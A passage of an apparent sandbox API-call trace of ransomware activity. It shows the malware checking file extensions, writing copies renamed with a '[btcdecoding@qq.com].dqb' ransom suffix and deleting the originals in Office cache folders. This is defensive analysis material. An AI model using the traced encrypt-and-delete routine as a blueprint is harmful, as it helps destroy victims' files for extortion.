Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString=".zip") returned 4 [0034.330] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.330] lstrlenW (lpString=".rar") returned 4 [0034.330] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".bz2") returned 4 [0034.330] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString=".7z") returned 3 [0034.330] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString=".dbf") returned 4 [0034.330] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString=".1cd") returned 4 [0034.330] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.330] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.330] lstrlenW (lpString=".jpg") returned 4 [0034.330] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.330] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.330] lstrlenW (lpString="Proof.xml") returned 9 [0034.331] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.331] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1347) returned 1 [0034.331] CloseHandle (hObject=0x1a4) returned 1 [0034.331] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0034.331] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.331] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.332] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.332] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.332] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.332] GetLastError () returned 0x0 [0034.332] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x543, lpOverlapped=0x0) returned 1 [0034.333] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x550, lpOverlapped=0x0) returned 1 [0034.334] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.334] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.334] SetEndOfFile (hFile=0x1a0) returned 1 [0034.334] CloseHandle (hObject=0x1a0) returned 1 [0034.335] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.335] SetEndOfFile (hFile=0x1a4) returned 1 [0034.336] CloseHandle (hObject=0x1a4) returned 1 [0034.336] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.336] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0034.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.336] lstrlenW (lpString=".doc") returned 4 [0034.336] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".docx") returned 5 [0034.337] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.337] lstrlenW (lpString=".pdf") returned 4 [0034.337] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".xls") returned 4 [0034.337] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".xlsx") returned 5 [0034.337] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.337] lstrlenW (lpString=".ppt") returned 4 [0034.337] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString=".zip") returned 4 [0034.337] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.337] lstrlenW (lpString=".rar") returned 4 [0034.337] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".bz2") returned 4 [0034.337] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".7z") returned 3 [0034.337] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString=".dbf") returned 4 [0034.337] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString=".1cd") returned 4 [0034.337] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString=".jpg") returned 4 [0034.337] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.337] lstrlenW (lpString=".doc") returned 4 [0034.337] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.337] lstrlenW (lpString=".docx") returned 5 [0034.337] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.338] lstrlenW (lpString=".pdf") returned 4 [0034.338] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString=".xls") returned 4 [0034.338] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString=".xlsx") returned 5 [0034.338] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.338] lstrlenW (lpString=".ppt") returned 4 [0034.338] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.338] lstrlenW (lpString=".zip") returned 4 [0034.338] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.338] lstrlenW (lpString=".rar") returned 4 [0034.338] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString=".bz2") returned 4 [0034.338] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString=".7z") returned 3 [0034.338] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.338] lstrlenW (lpString=".dbf") returned 4 [0034.338] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.338] lstrlenW (lpString=".1cd") returned 4 [0034.338] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.338] lstrlenW (lpString=".jpg") returned 4 [0034.338] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.338] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.338] lstrlenW (lpString="Proof.xml") returned 9 [0034.338] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.339] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1457) returned 1 [0034.339] CloseHandle (hObject=0x1a4) returned 1 [0034.339] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0034.339] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.339] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.339] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.339] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.339] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.340] GetLastError () returned 0x0 [0034.340] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0034.341] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.342] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.342] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.342] SetEndOfFile (hFile=0x1a0) returned 1 [0034.342] CloseHandle (hObject=0x1a0) returned 1 [0034.343] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.343] SetEndOfFile (hFile=0x1a4) returned 1 [0034.344] CloseHandle (hObject=0x1a4) returned 1 [0034.344] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.344] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0034.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.344] lstrlenW (lpString=".doc") returned 4 [0034.344] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.344] lstrlenW (lpString=".docx") returned 5 [0034.344] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.344] lstrlenW (lpString=".pdf") returned 4 [0034.344] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".xls") returned 4 [0034.345] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".xlsx") returned 5 [0034.345] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.345] lstrlenW (lpString=".ppt") returned 4 [0034.345] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString=".zip") returned 4 [0034.345] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.345] lstrlenW (lpString=".rar") returned 4 [0034.345] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".bz2") returned 4 [0034.345] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".7z") returned 3 [0034.345] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString=".dbf") returned 4 [0034.345] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString=".1cd") returned 4 [0034.345] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString=".jpg") returned 4 [0034.345] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.345] lstrlenW (lpString=".doc") returned 4 [0034.345] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".docx") returned 5 [0034.345] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.345] lstrlenW (lpString=".pdf") returned 4 [0034.345] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".xls") returned 4 [0034.345] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.345] lstrlenW (lpString=".xlsx") returned 5 [0034.346] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.346] lstrlenW (lpString=".ppt") returned 4 [0034.346] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.346] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.346] lstrlenW (lpString=".zip") returned 4 [0034.346] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.346] lstrlenW (lpString=".rar") returned 4 [0034.346] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.346] lstrlenW (lpString=".bz2") returned 4 [0034.346] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.346] lstrlenW (lpString=".7z") returned 3 [0034.346] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.346] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.346] lstrlenW (lpString=".dbf") returned 4 [0034.346] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.346] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.346] lstrlenW (lpString=".1cd") returned 4 [0034.346] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.346] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0034.346] lstrlenW (lpString=".jpg") returned 4 [0034.346] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.346] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.346] lstrlenW (lpString="Proof.xml") returned 9 [0034.346] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.346] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1458) returned 1 [0034.347] CloseHandle (hObject=0x1a4) returned 1 [0034.347] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0034.347] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.347] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.347] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.347] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.347] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.350] GetLastError () returned 0x0 [0034.350] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0034.702] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0034.703] ReadFile (in: hFile=0x1a4, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.703] WriteFile (in: hFile=0x1a0, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.703] SetEndOfFile (hFile=0x1a0) returned 1 [0034.703] CloseHandle (hObject=0x1a0) returned 1 [0034.704] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.704] SetEndOfFile (hFile=0x1a4) returned 1 [0034.705] CloseHandle (hObject=0x1a4) returned 1 [0034.705] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.705] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.705] lstrlenW (lpString=".doc") returned 4 [0034.705] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".docx") returned 5 [0034.706] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.706] lstrlenW (lpString=".pdf") returned 4 [0034.706] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".xls") returned 4 [0034.706] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".xlsx") returned 5 [0034.706] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.706] lstrlenW (lpString=".ppt") returned 4 [0034.706] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString=".zip") returned 4 [0034.706] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.706] lstrlenW (lpString=".rar") returned 4 [0034.706] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".bz2") returned 4 [0034.706] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".7z") returned 3 [0034.706] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString=".dbf") returned 4 [0034.706] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString=".1cd") returned 4 [0034.706] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0034.706] lstrlenW (lpString=".jpg") returned 4 [0034.706] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.706] lstrlenW 